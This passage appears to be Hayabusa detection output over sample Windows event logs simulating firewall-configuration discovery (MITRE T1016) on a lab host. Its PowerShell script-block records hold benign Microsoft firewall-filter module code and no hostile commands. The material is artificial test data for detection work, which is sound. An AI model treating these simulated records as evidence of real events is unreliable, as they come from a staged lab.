Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallAddressFilter ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallAddressFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallAddressFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 